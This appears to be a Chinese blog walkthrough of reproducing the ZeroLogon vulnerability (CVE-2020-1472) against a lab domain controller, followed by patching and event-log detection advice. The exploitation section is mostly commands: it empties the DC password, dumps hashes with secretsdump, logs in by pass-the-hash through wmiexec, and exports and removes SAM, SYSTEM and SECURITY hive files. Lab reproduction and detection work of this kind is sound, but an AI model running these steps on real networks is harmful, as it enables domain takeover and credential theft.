ZeroLogon漏洞复现(CVE-2020-1472)

  • A+
所属分类:安全文章


ZeroLogon漏洞复现(CVE-2020-1472)

漏洞简介

NetLogon组件 是 Windows 上一项重要的功能组件,用于用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,同时还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。

当攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的易受攻击的 Netlogon 安全通道时,存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应用程序。

漏洞影响

ZeroLogon漏洞复现(CVE-2020-1472)

漏洞复现

搭建搭建

见上一篇文章《Windows域环境搭建》

ZeroLogon漏洞复现(CVE-2020-1472)

靶机信息:

ZeroLogon漏洞复现(CVE-2020-1472)

ZeroLogon漏洞复现(CVE-2020-1472)

漏洞验证

https://github.com/SecuraBV/CVE-2020-1472

python3 zerologon_tester.py DC 192.168.235.128

ZeroLogon漏洞复现(CVE-2020-1472)

已验证靶机存在该漏洞。

漏洞利用

整个利用过程大概如下:

  • 置空域控密码

  • 获取新凭据

  • 获取半交互式shell-wmiexec.py

  • 获取初始凭据(sam)

  • 还原域控密码

置空域控密码

python exp/cve-2020-1472-exploit.py dc 192.168.235.128

ZeroLogon漏洞复现(CVE-2020-1472)

获取新凭据

这里获取的凭据是域管理员密码已被置空后的凭据

用/impacket/examples/secretsdump.py来获取域控中保存的hash

ZeroLogon漏洞复现(CVE-2020-1472)

密码已成功置空 :

ZeroLogon漏洞复现(CVE-2020-1472)

获取半交互shell-wmiexec.py

wmiexec.py

获取到HASH之后接下来我们就可以利用wmiexec.py登录,生成一个半交互式shell(管理员权限)
./wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:bed8fa867b81ae20c4b1c49c9f8fd72e qwe/[email protected]

ZeroLogon漏洞复现(CVE-2020-1472)

获取初始凭据(sam)

需要恢复域控的密码,所以要从sam中提取初始(置空前)的凭据

tips:注册表解析

HKLMSAM:包含用户密码的NTLM V2 HashHKLMSecurity:包含缓存的域记录LSA secrets/LSA密钥HKLMsystem-aka SYSKEY:包含可以用于加密LSA sercret和和SAM数据库的密钥

获取到shell后, 利用注册表命令将目标机上的的sam、system等文件导出

reg save HKLMSAM sam.save
reg save HKLMSYSTEM system.save
reg save HKLMSECURITY security.save

ZeroLogon漏洞复现(CVE-2020-1472)

下载导出的文件到本地

get sam.save
get system.save
get security.save

ZeroLogon漏洞复现(CVE-2020-1472)

删除保存在目标机上的文件

del /f sam.save
del /f system.save
del /f security.save

ZeroLogon漏洞复现(CVE-2020-1472)

利用/examples/secretsdump.py解析已经下载到在本地的sam

python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

ZeroLogon漏洞复现(CVE-2020-1472)

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:319afc90817a4762d2ad1f8ee9154877

初始初hash为:

319afc90817a4762d2ad1f8ee915487

还原域控密码

python3 reinstall_original_pw.py dc 192.168.235.128 319afc90817a4762d2ad1f8ee9154877


ZeroLogon漏洞复现(CVE-2020-1472)

验证是否还原成功

python3 secretsdump.py qwe/Administrator:@[email protected] -just-dc-user 'DC$'

ZeroLogon漏洞复现(CVE-2020-1472)

已成功还原。

漏洞原理

Netlogon 特权提升漏洞(CVE-2020-1472)原理分析与验证

https://www.anquanke.com/post/id/219943

漏洞防御

  1. 安装补丁

    https://msrc.microsoft.com/update-guide/zh-cn/vulnerability/CVE-2020-1472

威胁狩猎

日志审计

通过日志审计及时发现攻击者的攻击行为 。

  • CompMgmtLauncher -   服务器管理器

  • eventvwr -  事件查看器

  • compmgmt.msc -  计算机管理

CompMgmtLauncher :

ZeroLogon漏洞复现(CVE-2020-1472)

eventvwr:

ZeroLogon漏洞复现(CVE-2020-1472)

可以通过事件ID 4742和 事件ID 5805 初步判断 Zerologon 漏洞攻击:

事件 ID 4742

ZeroLogon漏洞复现(CVE-2020-1472)

事件 ID 5805

ZeroLogon漏洞复现(CVE-2020-1472)

例图:

ZeroLogon漏洞复现(CVE-2020-1472)

ZeroLogon漏洞复现(CVE-2020-1472)

CVE-2020-1472EventReader.ps1

帮助监视与CVE-2020-1472相关的Netlogon安全通道连接更改相关的事件ID的脚本:

https://support.microsoft.com/en-us/topic/script-to-help-in-monitoring-event-ids-related-to-changes-in-netlogon-secure-channel-connections-associated-with-cve-2020-1472-26434ae1-f9b9-90a0-cd0a-cfae9c5b2494

详见

https://support.microsoft.com/en-us/topic/how-to-manage-the-changes-in-netlogon-secure-channel-connections-associated-with-cve-2020-1472-f7e8cc17-0309-1d6a-304e-5ba73cd1a11e#Windows%20event%20log%20errors


参考:

https://github.com/dirkjanm/CVE-2020-1472

https://www.secura.com/blog/zero-logon

https://github.com/risksense/zerologon

https://github.com/bb00/zer0dump


本文始发于微信公众号(don9sec):ZeroLogon漏洞复现(CVE-2020-1472)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: